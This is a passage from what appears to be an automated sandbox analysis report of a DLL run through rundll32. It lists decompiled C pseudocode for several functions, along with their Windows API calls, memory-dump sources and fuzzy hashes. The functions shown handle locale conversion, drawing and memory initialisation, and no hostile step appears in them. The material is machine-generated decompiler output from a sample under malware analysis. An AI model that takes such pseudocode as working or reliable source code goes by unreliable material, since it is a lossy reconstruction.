                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                        										__eflags =  *_t11;
                                                                                                        									}
                                                                                                        									return 1;
                                                                                                        								}
                                                                                                        								L21:
                                                                                                        								_t54 = E1003F256(__eflags);
                                                                                                        								 *_t54 = 0x2a;
                                                                                                        								__eflags = _v8;
                                                                                                        								if(_v8 != 0) {
                                                                                                        									_t54 = _v12;
                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                        									__eflags =  *_t33;
                                                                                                        								}
                                                                                                        								return _t54 | 0xffffffff;
                                                                                                        							}
                                                                                                        							_t56 = _v20;
                                                                                                        							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                        							_t65 =  *_t15;
                                                                                                        							__eflags = _t65 - 1;
                                                                                                        							if(_t65 <= 1) {
                                                                                                        								L17:
                                                                                                        								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                        								__eflags = _a12 -  *_t24;
                                                                                                        								if(__eflags < 0) {
                                                                                                        									goto L21;
                                                                                                        								}
                                                                                                        								__eflags = _t73[1];
                                                                                                        								if(__eflags == 0) {
                                                                                                        									goto L21;
                                                                                                        								}
                                                                                                        								L19:
                                                                                                        								__eflags = _v8;
                                                                                                        								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                        								_t57 =  *_t27;
                                                                                                        								if(_v8 == 0) {
                                                                                                        									return _t57;
                                                                                                        								}
                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                        								return _t57;
                                                                                                        							}
                                                                                                        							__eflags = _a12 - _t65;
                                                                                                        							if(_a12 < _t65) {
                                                                                                        								goto L17;
                                                                                                        							}
                                                                                                        							__eflags = _a4;
                                                                                                        							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                        							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                        							__eflags = _t58;
                                                                                                        							_t56 = _v20;
                                                                                                        							if(_t58 != 0) {
                                                                                                        								goto L19;
                                                                                                        							}
                                                                                                        							goto L17;
                                                                                                        						}
                                                                                                        						_t59 = _a4;
                                                                                                        						__eflags = _t59;
                                                                                                        						if(_t59 != 0) {
                                                                                                        							 *_t59 =  *_t73 & 0x000000ff;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					} else {
                                                                                                        						_t60 = _a4;
                                                                                                        						if(_t60 != 0) {
                                                                                                        							 *_t60 = 0;
                                                                                                        						}
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

















                                                                                                        0x00000000
                                                                                                        0x1004c422
                                                                                                        0x1004c425
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1004c427
                                                                                                        0x1004c427
                                                                                                        0x1004c42a
                                                                                                        0x1004c42a
                                                                                                        0x1004c430
                                                                                                        0x1004c39e
                                                                                                        0x1004c39e
                                                                                                        0x1004c439
                                                                                                        0x00000000
                                                                                                        0x1004c439
                                                                                                        0x1004c3f2
                                                                                                        0x1004c3f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1004c3f9
                                                                                                        0x1004c407
                                                                                                        0x1004c40a
                                                                                                        0x1004c410
                                                                                                        0x1004c412
                                                                                                        0x1004c415
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1004c415
                                                                                                        0x1004c3b2
                                                                                                        0x1004c3b5
                                                                                                        0x1004c3b7
                                                                                                        0x1004c3bd
                                                                                                        0x1004c3bd
                                                                                                        0x00000000
                                                                                                        0x1004c38f
                                                                                                        0x1004c38f
                                                                                                        0x1004c394
                                                                                                        0x1004c396
                                                                                                        0x1004c396
                                                                                                        0x00000000
                                                                                                        0x1004c394
                                                                                                        0x1004c38d

                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1004C3A5
                                                                                                        • __isleadbyte_l.LIBCMT ref: 1004C3D9
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,1004C829,?,?,00000002), ref: 1004C40A
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,1004C829,?,?,00000002), ref: 1004C478
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 1f136a960d333aa963d0ca33f97f86f0634b8fd6f56abe0f7d608e50e996c3e2
                                                                                                        • Instruction ID: e6e4f33cd182b2a5cd514dd675fb53e5d8f2e879cd69e61f2bb6d8a525780b16
                                                                                                        • Opcode Fuzzy Hash: 1f136a960d333aa963d0ca33f97f86f0634b8fd6f56abe0f7d608e50e996c3e2
                                                                                                        • Instruction Fuzzy Hash: B531C071A0028AEFDB90CFA4C894DBE3BE5EF01252F2585B9E464DB091D3709E40CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 73%
                                                                                                        			E1001F458(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, int _a8) {
                                                                                                        				struct tagRECT* _v8;
                                                                                                        				intOrPtr* _v12;
                                                                                                        				void* _v28;
                                                                                                        				void* __ebp;
                                                                                                        				int _t41;
                                                                                                        				intOrPtr _t47;
                                                                                                        				intOrPtr _t62;
                                                                                                        				intOrPtr* _t65;
                                                                                                        				void* _t74;
                                                                                                        				int _t76;
                                                                                                        				void* _t79;
                                                                                                        				intOrPtr* _t81;
                                                                                                        
                                                                                                        				_t79 = __esi;
                                                                                                        				_t74 = __edi;
                                                                                                        				_t67 = __ecx;
                                                                                                        				_t65 = __ebx;
                                                                                                        				_t84 = __ecx;
                                                                                                        				_v12 = __ecx;
                                                                                                        				if(__ecx == 0) {
                                                                                                        					L1:
                                                                                                        					E1000836F(_t65, _t67, _t74, _t79, _t84);
                                                                                                        				}
                                                                                                        				_push(_t65);
                                                                                                        				_t65 = _a4;
                                                                                                        				_push(_t79);
                                                                                                        				_push(_t74);
                                                                                                        				if(_t65 == 0) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				_t41 = _a8;
                                                                                                        				_v8 = _t41 + 0x24;
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_a4 =  *((intOrPtr*)(_t41 + 0x14));
                                                                                                        				asm("movsd");
                                                                                                        				 *((intOrPtr*)( *_t65 + 0x1c))();
                                                                                                        				E10008722(_t65, 0, 0, 0, 0);
                                                                                                        				_t81 = _v12;
                                                                                                        				_t47 =  *((intOrPtr*)(_t81 + 0x74));
                                                                                                        				_t76 = _a8;
                                                                                                        				 *((intOrPtr*)(_t76 + 0x14)) = _t47;
                                                                                                        				if(_t47 < _a4) {
                                                                                                        					while(1) {
                                                                                                        						 *((intOrPtr*)( *_t81 + 0x158))(_t65, _t76);
                                                                                                        						_a8 = GetDeviceCaps( *(_t65 + 8), 0xa);
                                                                                                        						SetRect(_v8, 0, 0, GetDeviceCaps( *(_t65 + 8), 8), _a8);
                                                                                                        						DPtoLP( *(_t65 + 8), _v8, 2);
                                                                                                        						 *((intOrPtr*)( *_t81 + 0x178))(_t65, _t76);
                                                                                                        						_t62 =  *((intOrPtr*)(_t76 + 0x14));
                                                                                                        						if(_t62 ==  *((intOrPtr*)(_t81 + 0x74))) {
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        						 *((intOrPtr*)(_t76 + 0x14)) = _t62 + 1;
                                                                                                        						if( *((intOrPtr*)(_t76 + 0x14)) < _a4) {
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        						goto L6;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L6:
                                                                                                        				_a8 = 0 |  *((intOrPtr*)(_t76 + 0x14)) == _a4;
                                                                                                        				 *((intOrPtr*)( *_t65 + 0x20))(0xffffffff);
                                                                                                        				 *((intOrPtr*)(_t76 + 0x14)) = _a4;
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				return _a8;
                                                                                                        			}
















                                                                                                        APIs
                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 1001F4C0
                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 1001F4CE
                                                                                                        • SetRect.USER32 ref: 1001F4DF
                                                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 1001F4ED
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Exception@8H_prolog3RectThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 384053298-0
                                                                                                        • Opcode ID: 52f035f73c756c74fd7213ea2a16f9090fdcb56e219942f02a92e618c0205155
                                                                                                        • Instruction ID: 1e4b15356a76beedb3eb08749018a57921504bbb96488bad4b4a6fd09fa74d90
                                                                                                        • Opcode Fuzzy Hash: 52f035f73c756c74fd7213ea2a16f9090fdcb56e219942f02a92e618c0205155
                                                                                                        • Instruction Fuzzy Hash: 7B311975600A14AFDB01DF68C988AAABBF5FF49351F108168F949DB251D730EA81CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002A66D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t29;
                                                                                                        				intOrPtr _t32;
                                                                                                        				intOrPtr _t35;
                                                                                                        				intOrPtr _t36;
                                                                                                        				intOrPtr _t37;
                                                                                                        				signed int _t39;
                                                                                                        				void* _t47;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				void* _t50;
                                                                                                        				void* _t51;
                                                                                                        				void* _t64;
                                                                                                        				void* _t65;
                                                                                                        				intOrPtr _t66;
                                                                                                        				void* _t68;
                                                                                                        				void* _t70;
                                                                                                        
                                                                                                        				_t65 = __edi;
                                                                                                        				_t64 = __edx;
                                                                                                        				_t51 = E1000AB4C(_t50, __ecx, __edi, _t68, __eflags);
                                                                                                        				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                                                                        				if(_t29 == 0) {
                                                                                                        					L19:
                                                                                                        					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                                                                        				}
                                                                                                        				_t32 = _t29 - 1;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                                                                        				if(_t32 != 0) {
                                                                                                        					goto L19;
                                                                                                        				}
                                                                                                        				if(_a4 == 0) {
                                                                                                        					L8:
                                                                                                        					_push(_t65);
                                                                                                        					_t66 =  *((intOrPtr*)(E1000AB19(_t51, _t65, 0, _t77) + 4));
                                                                                                        					_t70 = E10029CA8(0x10097504);
                                                                                                        					if(_t70 == 0 || _t66 == 0) {
                                                                                                        						L18:
                                                                                                        						goto L19;
                                                                                                        					} else {
                                                                                                        						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                        						_t80 = _t35;
                                                                                                        						if(_t35 == 0) {
                                                                                                        							L12:
                                                                                                        							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                                                                        								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                        								_a4 = _a4 & 0x00000000;
                                                                                                        								_t83 = _t36;
                                                                                                        								if(_t36 != 0) {
                                                                                                        									_push(_t36);
                                                                                                        									_t39 = E10040181(_t51, _t64, _t66, _t70, _t83);
                                                                                                        									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                                                                        									_a4 = _t39;
                                                                                                        									E10039F30(_t51, _t66, _t70, _t83);
                                                                                                        								}
                                                                                                        								_t37 = E1003A230(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                                                                        								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                                                                        								if(_t37 == 0 && _a4 != _t37) {
                                                                                                        									 *((intOrPtr*)(_t70 + 0xc)) = E1003A230(_t51, _t64, _t66, _t70, _a4);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_push(_t35);
                                                                                                        						if(E10040181(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if(_a4 != 0xffffffff) {
                                                                                                        					_t47 = E10028B71();
                                                                                                        					if(_t47 != 0) {
                                                                                                        						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                                                                        						_t77 = _t48;
                                                                                                        						if(_t48 != 0) {
                                                                                                        							 *_t48(0, 0);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                                                                        				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                                                                        				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                                                                        				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                                                                        				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                                                                        				goto L8;
                                                                                                        			}






















                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __msize_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1288803200-0
                                                                                                        • Opcode ID: af7caa76c6878da24c0974d9897d1e72ce0594f52bc9d54e21a1dc465a5897ea
                                                                                                        • Instruction ID: f7a44f1ba5387b2ca440894864c24ef8828f27413fd616c068b9ad83a3ac2100
                                                                                                        • Opcode Fuzzy Hash: af7caa76c6878da24c0974d9897d1e72ce0594f52bc9d54e21a1dc465a5897ea
                                                                                                        • Instruction Fuzzy Hash: D321A035A046109FCB55DF30EC8595A77E5EF423A0B918A29EC18CB186DF30ECD0CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E1002DBEF(intOrPtr* __ecx, void* __eflags, struct tagPOINT _a4, intOrPtr _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				struct tagRECT _v24;
                                                                                                        				struct tagRECT _v40;
                                                                                                        				signed int _t30;
                                                                                                        				signed char _t34;
                                                                                                        				signed int _t35;
                                                                                                        				signed int _t41;
                                                                                                        				void* _t56;
                                                                                                        				signed int _t58;
                                                                                                        				intOrPtr* _t61;
                                                                                                        
                                                                                                        				_t61 = __ecx;
                                                                                                        				_v8 =  *((intOrPtr*)( *__ecx + 0xc))();
                                                                                                        				E1002DA71(__ecx,  &_v24);
                                                                                                        				_push(_a8);
                                                                                                        				_t30 = PtInRect( &_v24, _a4.x);
                                                                                                        				if(_t30 != 0) {
                                                                                                        					_t58 = 0;
                                                                                                        					do {
                                                                                                        						if((_v8 & 1 << _t58) == 0) {
                                                                                                        							goto L5;
                                                                                                        						}
                                                                                                        						E1002DAC3(_t61, _t56, _t58,  &_v24);
                                                                                                        						_push(_a8);
                                                                                                        						if(PtInRect( &_v24, _a4.x) != 0) {
                                                                                                        							_t35 = _t58;
                                                                                                        							L13:
                                                                                                        							return _t35;
                                                                                                        						}
                                                                                                        						L5:
                                                                                                        						_t58 = _t58 + 1;
                                                                                                        					} while (_t58 < 8);
                                                                                                        					_t34 =  *(_t61 + 4);
                                                                                                        					_v8 = _t34;
                                                                                                        					if((_t34 & 0x00000004) != 0) {
                                                                                                        						L12:
                                                                                                        						_t35 = 8;
                                                                                                        						goto L13;
                                                                                                        					}
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					E1002D766( &_v40);
                                                                                                        					if((_v8 & 0x00000002 | 0x00000001) != 0) {
                                                                                                        						InflateRect( &_v40, 1, 1);
                                                                                                        					}
                                                                                                        					_push(_a8);
                                                                                                        					_t41 = PtInRect( &_v40, _a4);
                                                                                                        					if(_t41 != 0) {
                                                                                                        						goto L12;
                                                                                                        					} else {
                                                                                                        						_t35 = _t41 | 0xffffffff;
                                                                                                        						goto L13;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t30 | 0xffffffff;
                                                                                                        			}














                                                                                                        APIs
                                                                                                          • Part of subcall function 1002DA71: InflateRect.USER32(1002E0A6,00000000,00000000), ref: 1002DAAC
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002DC1C
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002DC51
                                                                                                        • InflateRect.USER32(?,00000001,00000001), ref: 1002DC8D
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002DC9D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Inflate
                                                                                                        • String ID:
                                                                                                        • API String ID: 3687081316-0
                                                                                                        • Opcode ID: 573d57852034c20257ad405262cb508a5a3f7dea0af8832503ed6fcadfa9d461
                                                                                                        • Instruction ID: 35d4ff70deb68601e1a6f24137885eac82e657c5a127cb3b987647d9d18ffc71
                                                                                                        • Opcode Fuzzy Hash: 573d57852034c20257ad405262cb508a5a3f7dea0af8832503ed6fcadfa9d461
                                                                                                        • Instruction Fuzzy Hash: 3F216D32A0060AABDF10EFA4DD80ADE77EDEF44354B604426F915E7190E6B1EE05DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1001B3D4(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
                                                                                                        				intOrPtr _v12;
                                                                                                        				char _v16;
                                                                                                        				struct tagRECT _v32;
                                                                                                        				struct HDC__* _v44;
                                                                                                        				char _v52;
                                                                                                        				struct tagTEXTMETRICA _v108;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t26;
                                                                                                        				int _t36;
                                                                                                        				intOrPtr _t41;
                                                                                                        				void* _t45;
                                                                                                        				void* _t46;
                                                                                                        				intOrPtr* _t47;
                                                                                                        				intOrPtr* _t61;
                                                                                                        				intOrPtr _t62;
                                                                                                        
                                                                                                        				_t61 = __ecx;
                                                                                                        				_push(0);
                                                                                                        				E10009002(_t45,  &_v52, 0, __ecx, __eflags);
                                                                                                        				_t26 = SendMessageA( *(_t61 + 0x20), 0x31, 0, 0);
                                                                                                        				_t46 = 0;
                                                                                                        				if(_t26 != 0) {
                                                                                                        					_t46 = E1001B348( &_v52, _t26);
                                                                                                        				}
                                                                                                        				GetTextMetricsA(_v44,  &_v108);
                                                                                                        				_t65 = _t46;
                                                                                                        				if(_t46 != 0) {
                                                                                                        					E1001B348( &_v52, _t46);
                                                                                                        				}
                                                                                                        				E10009056(_t46,  &_v52, 0, _t61, _t65);
                                                                                                        				SetRectEmpty( &_v32);
                                                                                                        				 *((intOrPtr*)( *_t61 + 0x140))( &_v32, _a12);
                                                                                                        				 *((intOrPtr*)( *_t61 + 0x110))(0x407, 0,  &_v16);
                                                                                                        				_t47 = _a4;
                                                                                                        				 *_t47 = 0x7fff;
                                                                                                        				_t36 = GetSystemMetrics(6);
                                                                                                        				_t62 =  *((intOrPtr*)(_t61 + 0x94));
                                                                                                        				_t41 = _t36 + _v12 + _t36 + _v12 - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
                                                                                                        				 *((intOrPtr*)(_t47 + 4)) = _t41;
                                                                                                        				if(_t41 < _t62) {
                                                                                                        					 *((intOrPtr*)(_t47 + 4)) = _t62;
                                                                                                        				}
                                                                                                        				return _t47;
                                                                                                        			}






















                                                                                                        APIs
                                                                                                          • Part of subcall function 10009002: __EH_prolog3.LIBCMT ref: 10009009
                                                                                                          • Part of subcall function 10009002: GetDC.USER32(00000000), ref: 10009035
                                                                                                        • SendMessageA.USER32 ref: 1001B3F1
                                                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1001B40F
                                                                                                        • SetRectEmpty.USER32(?), ref: 1001B42E
                                                                                                        • GetSystemMetrics.USER32 ref: 1001B46A
                                                                                                          • Part of subcall function 1001B348: SelectObject.GDI32(?,?), ref: 1001B357
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Metrics$EmptyH_prolog3MessageObjectRectSelectSendSystemText
                                                                                                        • String ID:
                                                                                                        • API String ID: 2929776503-0
                                                                                                        • Opcode ID: bc2ffc35ddb32c31155028ae070668d08351ffeaaa4aee59e5545593a40d1585
                                                                                                        • Instruction ID: 55925fb80c082c48170faea7f45b001d3cf4bafddf13ace22503d0a92c9a2fa2
                                                                                                        • Opcode Fuzzy Hash: bc2ffc35ddb32c31155028ae070668d08351ffeaaa4aee59e5545593a40d1585
                                                                                                        • Instruction Fuzzy Hash: 0021A476A00219AFDB11DFA4CC89DEEBBB9FF48700F004529F606AB155DB70A941CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E10025E53(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t31;
                                                                                                        				intOrPtr _t33;
                                                                                                        				intOrPtr _t42;
                                                                                                        				intOrPtr _t44;
                                                                                                        				intOrPtr _t45;
                                                                                                        				intOrPtr* _t47;
                                                                                                        				intOrPtr _t49;
                                                                                                        				void* _t50;
                                                                                                        
                                                                                                        				_push(4);
                                                                                                        				E1003EE82(0x10055390, __ebx, __edi, __esi);
                                                                                                        				_t49 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t50 - 0x10)) = __ecx;
                                                                                                        				E10009A72(__ecx, 0,  *((intOrPtr*)(_t50 + 0x14)));
                                                                                                        				_t47 = __ecx + 0x74;
                                                                                                        				 *((intOrPtr*)(_t50 - 4)) = 0;
                                                                                                        				 *((intOrPtr*)(__ecx)) = 0x1005cd04;
                                                                                                        				E1003E9B0(_t47, _t47, 0, 0x3c);
                                                                                                        				E1003E9B0(_t47, _t49 + 0xb0, 0, 0x3c);
                                                                                                        				_t42 = _t49 + 0xec;
                                                                                                        				E1003E9B0(_t47, _t42, 0, 0x40);
                                                                                                        				_t45 =  *((intOrPtr*)(_t50 + 8));
                                                                                                        				_t31 =  *(_t50 + 0xc) | 0x00000008;
                                                                                                        				_t44 = 0x3c;
                                                                                                        				 *((intOrPtr*)(_t49 + 0x54)) = 0x7006;
                                                                                                        				 *_t47 = _t44;
                                                                                                        				 *((intOrPtr*)(_t49 + 0xa0)) = _t42;
                                                                                                        				 *(_t49 + 0x88) = _t31;
                                                                                                        				 *((intOrPtr*)(_t49 + 0x94)) = E10034702;
                                                                                                        				if(_t45 == 0) {
                                                                                                        					 *((intOrPtr*)(_t49 + 0x80)) = _t49 + 0xb0;
                                                                                                        				} else {
                                                                                                        					 *(_t49 + 0x88) = _t31 | 0x00000040;
                                                                                                        					 *((intOrPtr*)(_t49 + 0x80)) = _t45;
                                                                                                        					E10007E59(_t47, _t49, _t50, _t49 + 0xb0, _t44, _t45, _t44);
                                                                                                        				}
                                                                                                        				_t33 =  *((intOrPtr*)(_t50 + 0x10));
                                                                                                        				if(_t33 != 0) {
                                                                                                        					 *(_t49 + 0x88) =  *(_t49 + 0x88) | 0x00000002;
                                                                                                        					 *((intOrPtr*)(_t49 + 0x7c)) =  *((intOrPtr*)(_t33 + 4));
                                                                                                        				}
                                                                                                        				return E1003EF21(_t49);
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10025E5A
                                                                                                          • Part of subcall function 10009A72: _memset.LIBCMT ref: 10009A89
                                                                                                        • _memset.LIBCMT ref: 10025E7F
                                                                                                        • _memset.LIBCMT ref: 10025E8E
                                                                                                        • _memset.LIBCMT ref: 10025E9E
                                                                                                          • Part of subcall function 10007E59: _memcpy_s.LIBCMT ref: 10007E69
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memset$H_prolog3_memcpy_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3303856939-0
                                                                                                        • Opcode ID: 8eb90a3def40fd99c5449e4a94d02d05f746ec80889ee011427b2ce362731b9a
                                                                                                        • Instruction ID: afbe7d5343e1a47d43685e625b756e1b264decff9b7b3496c06de3c4284e2a29
                                                                                                        • Opcode Fuzzy Hash: 8eb90a3def40fd99c5449e4a94d02d05f746ec80889ee011427b2ce362731b9a
